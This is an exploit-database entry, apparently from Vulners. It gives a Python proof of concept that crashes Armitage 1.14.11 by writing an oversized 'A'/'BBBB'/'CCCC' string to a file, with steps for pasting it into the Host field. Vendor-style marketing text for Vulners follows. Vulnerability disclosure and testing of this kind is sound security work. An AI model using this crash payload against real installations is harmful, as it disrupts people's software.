`# Exploit Title: Armitage - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-26
# Vendor Homepage: http://www.fastandeasyhacking.com/
# Software Link : http://www.fastandeasyhacking.com/download/
# Tested Version: 1.14.11
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python armitage.py
# 2.- Open Xarmitage.txt and copy content to clipboard
# 3.- Open Armitage
# 4.- In the small opend window, Paste ClipBoard on "Host" and click on "Connect"
# 5.- Then you will see that the program can't process the data and will crash!(after the processing operation)
#!/usr/bin/env python
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xarmitage.txt", "w")
f.write(crash)
f.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation